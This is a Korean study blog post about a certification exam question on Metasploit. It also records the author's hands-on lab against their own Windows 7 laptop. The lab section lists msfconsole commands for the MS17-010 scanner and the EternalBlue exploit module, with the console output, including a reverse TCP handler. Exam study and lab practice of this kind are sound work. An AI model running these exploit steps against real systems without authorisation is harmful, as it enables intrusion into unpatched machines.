정보기 필기 2023년 2회 PBT 문제 17번

23년 2회 필기 PBT 시험을 66점으로 합격했습니다. 7월29일 실기 시험을 준비하며, 어려웠던 문제와 틀린 문제를 정리해보겠습니다. 다른 문제들은 https://it-freelancer.tistory.com/1210 에서 확인 가능합니다.

 

문제

17. CVE 넘버링이 붙은 알려진 취약점 공격을 사용할 수 있도록 제공되는 도구는?

① xsser
② metasploit
③ ghidra
④ subfinder

 

 

 

 

시험 후기

전혀 모름. CVE 는 알지만 1~4까지 들어본 도구 없음. 이럴 땐 3번으로 통일해서 찍는다.

 

 

정답

2

 

 

실제 시험 문제와 제출 답안

문제번호의 X 표시는 99프로 찍었다는 표시이며 / 표시는 자신이 없다는 표시임

 

공부하면서

실기 준비를 위해 kali 리눅스를 설치했고, 해킹 노말틱님 영상을 여러개 보았더니 추천영상으로 뜬다.

metasploit 라는 것이 해킹툴로 아주 아주 아주 유명한가 보다.

이 문제이 정답률은 58프로. 나한테만 어려웠던 것이고 다른 사람들은 많이 들어봤나 보다. 

 

https://youtu.be/Tk-HXNin8f8

 

 

실습을 해봄

 

주요 명령어는 ...

 

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 192.168.35.66
run

 

최초 테스트는 Time out 이다.

[-] 192.168.35.66:445     - Rex::ConnectionTimeout: The connection with (192.168.35.66:445) timed out.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.35.66
RHOSTS => 192.168.35.66
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.35.66:445     - Rex::ConnectionTimeout: The connection with (192.168.35.66:445) timed out.
[*] 192.168.35.66:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

방화벽에 막혀 Time Out 이다.

윈도우즈 7 방화벽 개방 후에 다시 테스트 해봄.

smb_ms17_010 그리고 ms17_010_eternalblue 두 가지 테스트. 모두 취약하지 않다고 함
"Host does NOT appear vulnerable."

 

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.35.66:445     - Host does NOT appear vulnerable.
[*] 192.168.35.66:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.35.66
RHOSTS => 192.168.35.66
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.0.2.15:4444
[*] 192.168.35.66:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 192.168.35.66:445     - Host does NOT appear vulnerable.
[*] 192.168.35.66:445     - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.35.66:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >

 

내 노트북이 windows 7 이지만 패치가 되서 취약점이 존재하지 않나보다.
나중에 OS 재설치하게 되면 설치 직후(윈도우즈 업데이트 전)에 테스트를 해보고 싶다.